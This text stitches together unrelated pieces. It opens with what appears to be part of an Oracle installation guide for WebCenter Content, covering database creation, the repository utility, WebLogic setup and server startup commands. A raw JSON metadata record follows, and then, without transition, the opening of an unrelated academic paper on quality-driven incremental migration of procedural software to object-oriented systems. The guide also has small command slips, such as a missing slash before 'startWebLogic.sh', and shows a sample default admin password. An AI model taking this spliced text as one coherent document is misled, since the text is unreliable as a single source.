Creating the Database on the ASM Disk Groups
Now that the ASM disk groups are in place, you can create the Oracle Database using the standard Oracle tools.
The next steps will create the database to allow the WebLogic Repository Configuration Utility to create the necessary structures for WebCenter Content Manager.
1. Log on to the database host as the user oracle in an X session.
2. Change directory to the Oracle Database home directory and run 'bin/dbca'. The Database Configuration Assistant (DBCA) will be displayed as shown in Figure 25.
3. Click **Next**.
4. Ensure ‘Create a Database’ is selected and click Next. The Database Identification dialog will be shown as in Figure 26.
5. Enter the Global Database Name. In the example, it is **UCMDATA.example.com**.
The SID will be automatically populated from the Global Database Name, as seen in Figure 26.
6. Click **Next**.
7. The DBCA Management Options dialog will now be shown. In the example, in order to enable a daily disk backup to the FRA at 02:00 AM, the ‘Enable Daily Disk Backup to Recovery Area’ checkbox is checked and the ‘oracle’ username and password are entered, as shown in Figure 27.
8. Click Next.
9. The Database Credentials dialog window is shown. The allocation of passwords is usually defined by local security policy but in the example, the same password is used for all accounts. This is not recommended for a production installation.
10. Enter the Password and re-enter in the Confirm Password field as shown in Figure 28.
11. Click **Next**.
12. Next, define the Database File Locations. Since Oracle-managed files will be used, select Automatic Storage Management (ASM) from the Storage Type drop-down menu, and ensure that the radio-button beside Use Oracle-Managed Files is selected. Enter the data ASM Disk Group name in the Database Area field – in this example, it is `+UCMDATA`. Figure 29 shows these settings.
13. Click **Next**.
14. The Wizard will then prompt for the password specific to ASM, as shown in Figure 30. Enter the password and click **OK**.

Figure 30. DBCA ASM Credentials
15. The Recovery Configuration dialog will then be shown, as in Figure 31. Since the FRA is defined in the example, you can specify the Flash Recovery Area by selecting the checkbox to the left and entering the FRA ASM Disk Group name in the Flash Recovery Area. In the example, this is `+UCMFRA`.
It is good practice to have Archiving enabled to archive Redo Log files, so ensure that the Enable Archiving checkbox is set.
16. Click **Next**.
17. The Wizard will prompt for whether you want to add sample schemas to the database content. Since you will use the WebLogic Repository Configuration Utility to ensure that the database content is as required for WebCenter Content Management, you do not want sample schemas in the database content. Click Next.
18. The Database Initialization Parameters dialog will then be shown as in Figure 32. Local Database Policy should define what memory size to allocate to the UCM repository. The example accepts the suggested SGA and PGA combined size and uses Automatic Memory Management. For this example, all default settings except the Character Sets setting, which will be changed in the next step, are unchanged.
19. Click the Character Sets tab.
20. Set the default database character set to Unicode (AL32UTF8) for the Repository Creation Utility, as shown in Figure 33.
21. Click Next.
22. The Database Storage dialog is then shown as depicted in Figure 34. Click Next.
23. Finally, the last screen is shown with the option to Save as a Database Template and/or generate Database Creation Scripts. Local administration policy should dictate if these are required. None of these options are selected in the example. Click **Finish** as shown in Figure 35.
24. A Confirmation dialog is displayed with the option to save the configuration information as an HTML file. Click **OK**.
A progress dialog is then shown – as seen in Figure 36.
On successful completion of the tasks, the completion screen shown in Figure 37 will be displayed.
The database is now in place and ready to be set up for the WebCenter Content management application.
Installing the Oracle Fusion Middleware Components
The tasks required to install the Oracle Fusion Middleware components include creating the Oracle Fusion Middleware Repository, then installing Oracle WebLogic and WebCenter Content management software.
Creating the Oracle Fusion Middleware Repository
The Oracle Fusion Middleware Repository Creation Utility (RCU) is used to create the appropriate structures in the nominated database to ensure that the Oracle Fusion Middleware components are able to install and configure their own particular data and settings. The RCU can be downloaded from the Oracle web site.
Follow these steps to create the repository in the database:
1. Log on to the WebLogic host as the user ‘oracle’ in an X-based session.
2. Change directory to where the Oracle Fusion Middleware RCU has been unzipped. In the example, this is /stage/rcu.
3. Run rcuHome/bin/rcu.
4. The screen as shown in Figure 38 will be displayed. Click Next.

5. Ensure the ‘Create’ option is chosen by clicking on the radio-button, as shown in Figure 39, and Click **Next**.

6. In the next step, specify the details for the database just created in the previous section, and apply by clicking on **Next**.
In the example shown in Figure 40, the database host is x4450-1 and the database listener is sitting on port 1521. The service name (the full name of the database) is UCM.example.com. The user with ‘sysdba’ privileges is ‘sys’ and the example uses the **SYSDBA** role.
7. The RCU will then perform a check for prerequisite conditions and will display a progress dialog, like the example in Figure 41. Click OK.
8. Next, select the components that will be installed. During this step, you can change the prefix for the schema owners if required by local administration policy. In this example, no changes are made.
9. Ensure that WebCenter Content is selected by clicking in the checkbox to the left of the title as shown in Figure 42, and then select **Next**.

10. The utility will perform a further check for component-specific prerequisites and display the results in a progress dialog window, as shown in Figure 43. Click **OK** to proceed.

The RCU will prompt for the schema passwords. In the example, the same password is used for all schemas, but the choice should be defined in the local database security policy.
11. Enter the password and re-enter in the Confirm Password field, if using the same password for all schemas, or fill in the details appropriate to local security policy, and Click Next.

Figure 44. RCU Schema Passwords screen
12. The tablespace map can then be customized to conform to local administration policy. In the example, the default mappings are accepted as shown in Figure 45 by clicking Next.

Figure 45. RCU Map Tablespaces displayed
13. A confirmation screen to indicate you want to proceed provides the option to return to the wizard and amend the tablespace map, as seen in Figure 46. Assuming you wish to continue with the tablespace creation, click OK.

14. The RCU wizard will then create and validate the tablespaces in the nominated database. A progress dialog window, seen in Figure 47, will be displayed. Once the tablespaces have been created, click OK to continue.

15. Next a summary screen like the one shown in Figure 48 will be displayed. Click **Create** to continue the operation.

**Finally, a completion summary will be displayed. Click **Close** to finish.**

The RCU has successfully completed at this point, so the database contains all the necessary components that Oracle Fusion Middleware requires for WebCenter Content management.
Installing Oracle WebLogic
The next step is installation of Oracle Fusion Middleware WebLogic Server, which has been downloaded as a ‘bin’ file and stored on the WebLogic host.
1. Log on to the WebLogic host.
2. Change directory to the download area where the WebLogic Server package has been stored. Figure 50 shows the /stage directory, which in this example contains the downloaded packages. Click Next to continue.
The Installer will then prompt for whether you are using an existing Middleware Home or creating a new one. In the example, this is the first WebLogic installation, so the Installer will show the steps for creating a new one.
3. Choose the Home Directory, either by clicking on an existing installation directory or creating a new one, as seen in Figure 51, and click **Next** to continue.
In the example, the new Middleware Home Directory is `/u01/middleware`.

4. The Installer provides the option to Register for Security Updates in the next screen. It is highly recommended that you take this option and enter your pre-registered email address for My Oracle Support and your Password in the appropriate fields. Figure 52 shows an example. Click **Next** to continue.

5. Next, choose an install type. If you are unfamiliar with WebLogic installations, choosing the Typical option is recommended. Do so by clicking the radio button and click **Next** to continue.

**Figure 53.** Choosing a WebLogic installation type
6. The Oracle Installer will then display a dialog showing the installation directories of the products being installed. It is highly recommended that these directories be left at the default values. Click **Next** to continue.
7. The Oracle Installer will then provide a summary of installations to be carried out. Click **Next** to continue.

**Figure 54.** WebLogic Installation Summary screen
8. The Oracle Installer will show a progress screen, and upon successful completion, a confirmation screen, as seen in Figure 55. The example shows a highlighted checkbox next to Run Quickstart which, in this example, will not be run. Clicking the checkbox ensures that it is unset. Click **Done** to end the installation procedure.

With the installation of WebLogic Server completed, you can now move on to installing WebCenter Content.
### Installing WebCenter Content
Like the WebLogic server, WebCenter Content will have been downloaded and unpacked on the WebLogic host already. The following steps show how this application is installed.
1. Log on to the WebLogic host as the **oracle** user and change directory to the place where WebCenter Content has been unpacked. In the example, this is `/stage`.
2. Run the installer by changing to the directory **Disk1**.
3. The Installer will then prompt for the JRE or JDK location. In the example, highlighted in a red box, `/usr/java` is typed.
4. The Installation welcome screen will appear, as shown in Figure 56. Click **Next** to continue.

Figure 56. WebCenter Content Installation window
5. The Installer will then prompt for whether you want to search for any software updates on My Oracle Support. It is recommended that you run this check by selecting the Search My Oracle Support for Updates radio button, entering your MOS User Name, your MOS Password and clicking Search For Updates.
An example of this search result is shown in Figure 57.
6. Click **Next**. The installer will then run prerequisite update checks. If any checks fail, you must take the suggested remedial action and re-run the checks until all pass.
7. An example of a clean check run is shown in Figure 58. Click **Next** to continue.
8. The Installer will then prompt for the Oracle Middleware Home where the WebCenter Content application will be installed. Choose the Home from the dropdown box and enter the Home Directory if the populated entries need modification. The example Oracle Middleware Home and Oracle Home Directory are shown in Figure 59. Click **Next** to continue.

9. The Installer will then determine which application server installations are available and, if appropriate, prompt for which one will be hosting WebCenter Content – either WebLogic Server or WebSphere. Select the appropriate application server by clicking the radio button next to the name. Click **Next** to continue.
In the example, only WebLogic Server is available, so WebSphere is not selectable, as seen in Figure 60.
10. The Installer will then show an Installation Summary screen. The details can be saved in a response file should it be required for administrative purposes. Click **Install** to continue. The example installation summary is shown in Figure 61.


11. The Installer now shows an Installation Progress screen which, when complete, will allow you to click **Next** to continue. The example Installation Progress screen is shown in Figure 62.

12. The Installer will then show the Installation Complete confirmation and provide the option to save Installation Details as seen in Figure 63. Click **Finish** to exit the Installer.

Configuring the Oracle WebLogic Domain
Now that the installation of the components is completed, you must perform some basic configuration.
Log on to the Oracle WebLogic host in an X-session as the oracle user and change directory to the Middleware Home Directory. In the example, this is /u01/middleware. Under this directory, you should find the WebCenter Content home directory specified in Figure 59 which, in the example, is Oracle_ECM1.
Change to this directory and then change to the directory common/bin. (In the provided example, the full directory is /u01/middleware/Oracle_ECM1/common/bin.)
The following steps will now configure the Oracle WebLogic domain.
1. Run ./config.sh to start the Fusion Middleware Configuration Wizard.
2. After a brief splash screen, you are given the option of creating a new WebLogic domain or extending an existing WebLogic domain. Choose the appropriate option by clicking the corresponding radio button and click Next to continue.
Continuing with the example, this is a new installation, so 'Create a new WebLogic domain' is selected, as seen in Figure 64.

3. The Configuration Wizard then provides a list of the products that will be supported by this domain. Click the checkbox next to the products you require. Click Next to continue.
The example in Figure 65 shows the following chosen:
- Oracle Universal Content Management – Inbound Refinery
- Oracle Universal Content Management – Content Server
Note that the Wizard may automatically choose other options (such as Oracle JRF) that are required to support the products you choose.
Figure 65. WebCenter Content product selection
4. The Wizard will now prompt for a domain name, location, and the location for the applications within the domain. In the example, shown in Figure 66, the default choices will be kept for simplicity. Click Next to continue.
5. The Wizard then prompts for the WebCenter Content administrator name and user password. After entering them, click **Next** to continue.
Local administration policy may determine what the username and passwords should be set to. In the example in figure 67, the default name is *weblogic* and user password is *oracle4u*. The same password is entered in the Confirm user password.
6. The Configuration Wizard then prompts for which JDK and Development mode you wish to use. If this is a development installation, then startup performance may be the priority. If so, choose the Sun SDK that is supplied in the window. Conversely, the
WebLogic JRockit SDK provides better performance for runtime and management, so it is better suited to Production mode.
Choose the deployment mode by clicking the radio button next to either Development Mode or Production Mode, and the JDK by selecting the appropriate option from the list of Available JDKs. Then click **Next** to continue.
The example is a development deployment, so the default Sun SDK is chosen, as seen in Figure 68.

Figure 68. WebCenter Content deployment mode and selected JDK
7. The Configuration Wizard will now prompt for the JDBC Component Schema details. This will require the database details as specified in Figure 40 when creating the RCU. Select each component entry pane in turn and enter the appropriate details for DBMS, Host Name, Port, Schema Owner and Schema Password, as seen in Figure 69, and click **Next**.
8. The wizard will then run a connection test to ensure that the details are correct. This is shown in Figure 70. Once you have reviewed the results, click **Next** to continue.
9. Next, you are prompted for the Optional Configuration details, where you can create deployment servers, clusters and hosts. At a minimum, you must define a WebCenter Content host, which will also have the Administration Server attached to it. You will then deploy the applications to these hosts (or host). Click **Next** to continue with these operations.
The example in Figure 71 shows the ‘Managed Servers, Clusters and Machines’ and ‘Deployments and Services’ checkboxes marked.

Figure 71. WebCenter Content Optional Configuration screen
At this point, your configuration may vary from the example, depending on which configuration options you chose. You should, however, see the following steps among those presented to you by the Configuration Wizard.
10. The wizard now presents the Configure Managed Servers screen, where you provide the Application Server instances’ names as well as define IP addresses on which the applications will listen, the Listen port and, if SSL is enabled, the SSL listen port. After making your entries, click **Next** to continue.
The example in Figure 72 shows the following choices: keeping the default server names, responding to all local IP addresses, setting the Listen port to the default of 16200 for UCM and 16250 for IBR, and SSL enabled with the default SSL listen ports selected.
11. The Configuration Wizard now prompts for any clustering configuration. Needed entries include: the cluster name, cluster messaging mode, if appropriate, multicast address and multicast port, and cluster address, should a cluster be deployed. After providing these entries, click Next to continue.
There are no clusters in the example deployment, so no entries are made in the Configure Clusters screen in Figure 73.
Figure 72. Configuring managed servers for WebCenter Content
Figure 73. Configuring a cluster in the WebCenter Content Configuration Wizard
The next window is the Configure Machines screen, in which you define the machine that will host the applications.
In the example, a Linux server will be deployed, so in Figure 74, the Unix Machine tab is chosen.
12. After selecting your appropriate tab (Machine or Unix Machine), click on the Add menu item. Supply the Name of the Machine, and change any details that will differ from the defaults.
You can set the application to run as any nominated user by selecting the 'Post bind UID enabled' checkbox and entering the username in the 'Post bind UID' field.
Similarly, you can designate the application to run with a specific group ID by selecting 'Post bind GID enabled' and entering the group name in the 'Post bind GID' field.
The Node Manager can restrict application access from the lost host only or from any network address by selecting the 'Node Manager Listen address'.
Once this configuration is properly set up, click Next to continue.
In the example, the defaults are accepted and only the name of the Unix machine needs to be changed, to WCCmachine as seen in Figure 74.
13. The Configuration Wizard now presents the option to assign servers to machines. To do so, control-click on each server in turn and click the right-facing arrow in the middle of the display to assign each application to the machine. Click Next to continue.
In the example in Figure 75, all the applications are assigned to the machine WCCmachine created in the previous step.
14. The Configuration Wizard now presents a window to modify deployments for each application server. The application server runs multiple "serverlets" – seen in Figure 75 under WCCmachine. The deployments shown in Figure 76 for the example show the Admin server (AdminServer), a UCM server (UCM_server1) and an inbound repository server (IBR_server1). Unless there is a specific reason for doing so, do not modify these values. Click **Next** to continue.
15. Similarly to the previous step, the Configuration Wizard next provides the option of targeting services to clusters or servers. Again, unless there is a compelling reason to change these, leave the default values in place and click **Next** to continue.
Figure 77 shows the example default values.

**Figure 77.** Configuration for WebCenter Content service deployment
16. The Configuration Wizard now displays the configuration summary, as seen in Figure 78. Click **Create** to continue.

**Figure 78.** WebCenter Content Configuration Summary screen
17. The progress screen will then be shown. Upon completion, click the **Done** button, highlighted in Figure 79, to exit the Wizard.

Figure 79. WebCenter Content configuration completed
Now that the configuration is completed, the next task is starting the necessary servers.
Starting the Administration Server / Oracle WebLogic
To start up WebCenter Content, it is necessary to start the Oracle WebLogic server first.
Change directory to the Middleware Home and locate the `user_projects/domains` directory. Within this directory will be a further directory named after the domain you created earlier – in the example, it is `base_domain`.
```
[oracle@x4450-1 ~]$ cd /u01/middleware/user_projects/domains/base_domain
```
Locate the script called `startWebLogic.sh` in this directory and execute it. The script only returns when the WebLogic server is shut down so you may want to run this script as a background job.
```
[oracle@x4450-1 base_domain]$ .startWebLogic.sh &
```
After a lengthy display of logging information, the screen will display the string “*<Server started in RUNNING mode>*.” Once this message is displayed, you can perform the next step in the configuration/startup procedure.
Starting the Node Manager
To avoid log messages becoming mixed together, open another window to start the Node Manager.
In the new window, change directory to the Oracle Fusion Middleware home directory, within which there is a directory tree oracle_common/common/bin. Change directory to this directory tree, find the script setNMProps.sh and execute it.
This script only needs to be run once but it does check that the work it needs to carry out is actually needed before performing any changes.
```
[oracle@x4450 middleware]$ cd /u01/middleware/oracle_common/common/bin
[oracle@x4450 bin]$ ./setNMProps.sh
```
Required properties already set. File nodemanager.properties not modified.
Now start the Node Manager process by changing to the Oracle WebLogic server installation directory (in the example, /u01/middleware/wlserver_10.3/server/bin).
```
[oracle@x4450 bin]$ cd /u01/middleware/wlserver_10.3/server/bin
[oracle@x4450 bin]$ ls
international setWLSEnv.sh startNodeManager.sh
[oracle@x4450 bin]$ ./startNodeManager.sh
```
```
+ export CLASSPATH
+ export PATH
+ cd /u01/middleware/wlserver_10.3/common/nodemanager
+ set -x
...
```
[Logging output deleted]
```
...
<Jul 30, 2012 8:33:15 PM BST> <Info> <Security> <BEA-090906> <Changing the default Random Number Generator in RSA CryptoJ from ECDRBG to FIPS186PRNG. To disable this change, specify -Dweblogic.security.allowCryptoJDefaultPRNG=true>
<Jul 30, 2012 8:33:16 PM> <INFO> <Secure socket listener started on port 5556>
Jul 30, 2012 8:33:16 PM weblogic.nodemanager.server.SSLListener run
INFO: Secure socket listener started on port 5556
```
58
Once the server displays the string “Secure socket listener started on port 5556”, you can open a Web browser instance to start up the WebCenter Content servers.
1. Open a Web browser to http://<ip-address>:7001/console to show the WebLogic Server login screen as shown in Figure 80. The default administrator name specified earlier and the associated password should be entered in the Username and Password fields. Click Login to continue.

2. In the Domain Structure box on the left of the web page, expand the Environment tree by clicking on the + icon and click Servers as highlighted in Figure 81.

3. The Summary of Servers table should appear to the right of the Domain Structure table. Click on the ‘Control’ tab and then select the check box to the right of UCM_server1 and IBR_server1 as shown in Figure 82.
4. Click **Start** to bring the servers online.

5. The servers will then begin their startup procedures, as shown in the Summary of Servers table. Initially, the Server table will appear as in Figure 83 with the state **STARTING** displayed.

Clicking the ‘.refresh’ icon will cause the table to automatically refresh. After the servers have started, the table will appear as in Figure 84 with the server states set to **RUNNING**.

Performing Runtime Configuration of WebCenter Content
With the successful start of the UCM and IBR servers, it is necessary to perform one last configuration before you can start using WebCenter Content.
1. Open a web browser to the URL https://<ip-addr>:16201/cs/ and enter the administrator username and password (in the example, weblogic and oracle4u respectively, as seen in Figure 85). Click Sign In to continue.
![WebCenter Content console]
Figure 85. WebCenter Content console
2. The next screen will show the configuration options that can be set to customize this WebCenter Content server. Carefully consider the values for these parameters before making any changes to them. Click Submit to continue.
The continued example’s parameters are shown in Figure 86.

Figure 86. WebCenter Content parameters displayed
The WebCenter Content server will then display a page, seen in Figure 87, requesting that the node be restarted.

Figure 87. WebCenter Content parameter settings completed
3. Back in the Web browser opened earlier in Figure 82, select UCM_server1 from the Summary of Servers table and click **Shutdown** and select **Force Shutdown Now**.
The example is shown in Figure 88.
Figure 88. Stopping the WebCenter Content server
4. Once the State has changed to **SHUTDOWN** as seen in Figure 89, select the check box to the left of **UCM_server1** and click the **Start** button to restart the WebCenter Content server, as seen in Figure 90.
Figure 89. Waiting until the WebCenter Content server has shut down
Figure 90. Restarting the WebCenter Content server
5. Wait until the server state changes to RUNNING. Then reopen the web browser to https://<ip-addr>:16201/cs. The WebCenter Content screen will now look different, as the WebCenter Content server is now fully installed and ready for local customizations. An example of the new layout is shown in Figure 91.
WebCenter Content is now available to serve your business content needs.
Conclusion
WebCenter Content provides a highly customizable content management environment. It is highly extensible and allows the creation of content-enabled applications while maintaining the necessary content security and accessibility.
When WebCenter Content is deployed with Oracle Database on the Oracle ZFS Storage Appliance, the advanced performance features of the Oracle ZFS Storage Appliance are leveraged to provide a highly scalable platform on which to perform fileserver consolidation or sophisticated multisite web content management.
Together, these Oracle products provide a robust and secure platform on which to build, grow and utilize your business content.
References
Oracle ZFS Storage Appliance Documentation
Oracle WebCenter Content Product Pages
http://www.oracle.com/technetwork/middleware/webcenter/content/overview/index.html
Oracle ZFS Storage Appliance Product Pages
Oracle Database Product Pages
|
{"Source-Url": "http://www.oracle.com/technetwork/server-storage/sun-unified-storage/documentation/webcenter-cms-43013-1941403.pdf", "len_cl100k_base": 11684, "olmocr-version": "0.1.53", "pdf-total-pages": 68, "total-fallback-pages": 0, "total-input-tokens": 115192, "total-output-tokens": 14974, "length": "2e13", "weborganizer": {"__label__adult": 0.0003409385681152344, "__label__art_design": 0.0005140304565429688, "__label__crime_law": 0.0003516674041748047, "__label__education_jobs": 0.0014925003051757812, "__label__entertainment": 0.00014591217041015625, "__label__fashion_beauty": 0.0001819133758544922, "__label__finance_business": 0.0052642822265625, "__label__food_dining": 0.00026988983154296875, "__label__games": 0.0007386207580566406, "__label__hardware": 0.00707244873046875, "__label__health": 0.0002913475036621094, "__label__history": 0.0003116130828857422, "__label__home_hobbies": 0.00022614002227783203, "__label__industrial": 0.0015172958374023438, "__label__literature": 0.00021970272064208984, "__label__politics": 0.00029730796813964844, "__label__religion": 0.0004429817199707031, "__label__science_tech": 0.1273193359375, "__label__social_life": 0.0001138448715209961, "__label__software": 0.235107421875, "__label__software_dev": 0.61669921875, "__label__sports_fitness": 0.00017547607421875, "__label__transportation": 0.00047969818115234375, "__label__travel": 0.00021588802337646484}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 54487, 0.03754]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 54487, 0.38198]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 54487, 0.80175]], "google_gemma-3-12b-it_contains_pii": [[0, 127, false], [127, 2600, null], [2600, 3122, null], [3122, 4983, null], [4983, 5885, null], [5885, 7073, null], [7073, 7619, null], [7619, 9389, null], [9389, 10746, null], [10746, 11728, null], [11728, 12452, null], [12452, 14146, null], [14146, 15717, null], [15717, 16888, null], [16888, 17811, null], [17811, 18939, null], [18939, 19596, null], [19596, 20586, null], [20586, 21973, null], [21973, 22306, null], [22306, 23277, null], [23277, 24134, null], [24134, 24685, null], [24685, 25028, null], [25028, 25323, null], [25323, 26075, null], [26075, 26713, null], [26713, 27463, null], [27463, 27690, null], [27690, 28157, null], [28157, 28359, null], [28359, 29371, null], [29371, 29931, null], [29931, 30277, null], [30277, 30894, null], [30894, 31426, null], [31426, 31961, null], [31961, 32242, null], [32242, 32842, null], [32842, 33754, null], [33754, 34509, null], [34509, 35572, null], [35572, 36107, null], [36107, 36371, null], [36371, 37225, null], [37225, 37603, null], [37603, 38121, null], [38121, 39477, null], [39477, 40053, null], [40053, 40691, null], [40691, 41607, null], [41607, 42146, null], [42146, 43181, null], [43181, 43744, null], [43744, 45221, null], [45221, 45678, null], [45678, 46343, null], [46343, 47579, null], [47579, 49754, null], [49754, 50472, null], [50472, 51258, null], [51258, 51974, null], [51974, 52511, null], [52511, 52932, null], [52932, 53313, null], [53313, 53995, null], [53995, 54487, null], [54487, 54487, null]], "google_gemma-3-12b-it_is_public_document": [[0, 127, true], [127, 2600, null], [2600, 3122, null], [3122, 4983, null], [4983, 5885, null], [5885, 7073, null], [7073, 7619, null], [7619, 9389, null], [9389, 10746, null], [10746, 11728, null], [11728, 12452, null], [12452, 14146, null], [14146, 15717, null], [15717, 16888, null], [16888, 17811, null], [17811, 18939, null], [18939, 19596, null], [19596, 20586, null], [20586, 21973, null], [21973, 22306, null], [22306, 23277, null], [23277, 24134, null], [24134, 24685, null], [24685, 25028, null], [25028, 25323, null], [25323, 26075, null], [26075, 26713, null], [26713, 27463, null], [27463, 27690, null], [27690, 28157, null], [28157, 28359, null], [28359, 29371, null], [29371, 29931, null], [29931, 30277, null], [30277, 30894, null], [30894, 31426, null], [31426, 31961, null], [31961, 32242, null], [32242, 32842, null], [32842, 33754, null], [33754, 34509, null], [34509, 35572, null], [35572, 36107, null], [36107, 36371, null], [36371, 37225, null], [37225, 37603, null], [37603, 38121, null], [38121, 39477, null], [39477, 40053, null], [40053, 40691, null], [40691, 41607, null], [41607, 42146, null], [42146, 43181, null], [43181, 43744, null], [43744, 45221, null], [45221, 45678, null], [45678, 46343, null], [46343, 47579, null], [47579, 49754, null], [49754, 50472, null], [50472, 51258, null], [51258, 51974, null], [51974, 52511, null], [52511, 52932, null], [52932, 53313, null], [53313, 53995, null], [53995, 54487, null], [54487, 54487, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 54487, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 54487, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 54487, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 54487, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 54487, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 54487, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 54487, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 54487, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 54487, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 54487, null]], "pdf_page_numbers": [[0, 127, 1], [127, 2600, 2], [2600, 3122, 3], [3122, 4983, 4], [4983, 5885, 5], [5885, 7073, 6], [7073, 7619, 7], [7619, 9389, 8], [9389, 10746, 9], [10746, 11728, 10], [11728, 12452, 11], [12452, 14146, 12], [14146, 15717, 13], [15717, 16888, 14], [16888, 17811, 15], [17811, 18939, 16], [18939, 19596, 17], [19596, 20586, 18], [20586, 21973, 19], [21973, 22306, 20], [22306, 23277, 21], [23277, 24134, 22], [24134, 24685, 23], [24685, 25028, 24], [25028, 25323, 25], [25323, 26075, 26], [26075, 26713, 27], [26713, 27463, 28], [27463, 27690, 29], [27690, 28157, 30], [28157, 28359, 31], [28359, 29371, 32], [29371, 29931, 33], [29931, 30277, 34], [30277, 30894, 35], [30894, 31426, 36], [31426, 31961, 37], [31961, 32242, 38], [32242, 32842, 39], [32842, 33754, 40], [33754, 34509, 41], [34509, 35572, 42], [35572, 36107, 43], [36107, 36371, 44], [36371, 37225, 45], [37225, 37603, 46], [37603, 38121, 47], [38121, 39477, 48], [39477, 40053, 49], [40053, 40691, 50], [40691, 41607, 51], [41607, 42146, 52], [42146, 43181, 53], [43181, 43744, 54], [43744, 45221, 55], [45221, 45678, 56], [45678, 46343, 57], [46343, 47579, 58], [47579, 49754, 59], [49754, 50472, 60], [50472, 51258, 61], [51258, 51974, 62], [51974, 52511, 63], [52511, 52932, 64], [52932, 53313, 65], [53313, 53995, 66], [53995, 54487, 67], [54487, 54487, 68]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 54487, 0.0]]}
|
olmocr_science_pdfs
|
2024-12-10
|
2024-12-10
|
2ed350eeff8d84bf50eb7fb9711301e86d360d2f
|
Incremental Quality Driven Software Migration to Object Oriented Systems
Ying Zou
Dept. of Electrical & Computer Engineering
Queen’s University
Kingston, ON, K7L 3N6, Canada
zouy@post.queensu.ca
Abstract
In the context of software maintenance, legacy software systems are continuously re-engineered in order to correct errors, provide new functionality, or port them into modern platforms. However, software re-engineering activities should not occur in a vacuum, and it is important to incorporate non-functional requirements as part of the re-engineering process. This paper presents an incremental reengineering framework that allows for quality requirements to be modeled as soft-goals, and transformations to be applied selectively towards achieving specific quality requirements for the target system. Moreover, to deal with large software systems, a system can be decomposed into a collection of smaller clusters. The reengineering framework can be applied incrementally to each of these clusters and results are assembled to produce the final system. Using the theory presented in this paper, we developed a reengineering toolkit to automatically migrate procedural systems to object oriented platforms. We used the toolkit to migrate a number of open source systems including Apache, Bash and Clips. The obtained results demonstrate the effectiveness, usefulness, and scalability of our proposed incremental quality driven migration framework.
1. Introduction
Software systems are continuously being evolved soon after their first version is delivered to meet the changing requirements of their users. Software practitioners are performing changes daily to source code such as correcting errors, adding new functionality, and adopting new technologies to ensure the users’ needs are met. Otherwise the software system will be abandoned. Unfortunately, as pointed out by Lehman’s laws of evolution, the quality of an evolving program tends to decline, and its structure becomes more complex [1]. Therefore, legacy systems become harder to understand and maintain after many years of evolution. To extend the lifecycle of a legacy system, migration of procedural systems into object oriented platforms provides a promising solution to leverage business values entailed in such systems. However, most legacy systems are written in a variety of procedural languages, are composed of millions of lines of code, and have deteriorating quality. It is a challenging task to devise a tractable methodology where source code transformations can be associated with specific quality improvements and can be applied for the migration of procedural systems to the object oriented platforms.
In our previous work [2], we introduced a unified domain model for a variety of procedural languages such as C, Pascal, COBOL and Fortran. This unified model is implemented in XML and denotes common features among these languages such as routines, subroutines, function, procedures, types, just to name a few. Using this unified model, we can apply standardized transformations upon systems written in a variety of procedural languages. These transformations can migrate procedural code to object oriented platforms.
Moreover, we proposed a quantitative framework [3] that monitors and evaluates software qualities at each step of the re-engineering process. This approach allows for quality requirements, such as high maintainability and reusability, to be modeled as soft-goals. To operationalize these quality requirements into the migration process, we construct the migration process as a state transition system, which consists of a sequence of transformations each one of which alters the state of the system being migrated.
The Viterbi algorithm and Markov chain type of models can identify the optimal sequence of transformations that could achieve the highest quality in the migrated system. In this respect, the re-engineering process is fine-tuned so that the migrated system conforms to specific target objectives/requirements, such as better performance or higher maintainability.
In this paper, we are particularly interested in improving the scalability of our quality driven migration framework. To keep the complexity and the risk of the
migration of large system into manageable levels, we propose an incremental approach that allows for the decomposition of legacy systems into smaller manageable units (clusters). A state transition approach is applied to each such cluster to identify an object model with the highest quality. Then an incremental merging process allows for the amalgamation of the different partial object models into an aggregate composite model for the whole system. Furthermore, to avoid the state explosion for large legacy systems, we enhance the Viterbi algorithm to limit the number of states generated. In this way, the proposed quality driven migration framework can tackle large systems in an acceptable hardware and software resource requirements. Moreover, we propose techniques to validate the quality of the object models derived through our migration framework.
This paper is organized as follows. Section 2 gives an overview of the proposed quality driven software migration framework. Section 3 presents system segmentation and amalgamation processes to enable incremental migration of procedural systems into object oriented platforms. Section 4 presents cases studies that utilized the proposed approach. Section 5 discusses the related work. Section 6 concludes the paper.
2. Quality Driven Software Migration Framework
The object oriented migration process involves the analysis of the Abstract Syntax Tree (AST) of the procedural code, the identification of object models, and the generation of object oriented code. One of the major objectives of our research is to incorporate quality as an integral part of the migration process. We propose a quality driven software migration framework to achieve this objective. The focal points of the framework include: 1) the identification and the modeling of quality requirements in the target system and 2) the operationalization of these requirements into the reengineering process to produce the highest quality system. In the following subsections, we discuss these two focal points in more details.
2.1 Modeling Quality Requirements
To drive the migration process to meet specific quality requirements (such as high maintainability), we provide a software quality modeling process that elicits quality goals, models these quality goals in a measurable level, and evaluates the achievement of these desired qualities in the final migrated system. Typically, quality requirements are modeled in a top down manner, which involves identifying a set of high-level quality goals, such as maintainability, subdividing and refining these goals into more specific low level attributes (e.g., design decisions, or software code features). The lowest level attributes can be directly measurable using software metrics. In our previous work, we adopted soft-goal interdependency graphs [4] to associate source code features with high-level quality goals. In such graphs, nodes represent design decisions, and edges denote positive or negative dependencies towards a specific requirement. The leaves of such graphs correspond to measurable source code features that impact other nodes to which they are connected. A set of metrics is selected to compute the corresponding source code features, appearing as leaves in the soft-goal interdependency graph. The metric results of the leaf nodes indirectly reflect the satisfaction of their direct or indirect parent nodes in the soft-goal interdependency graph.
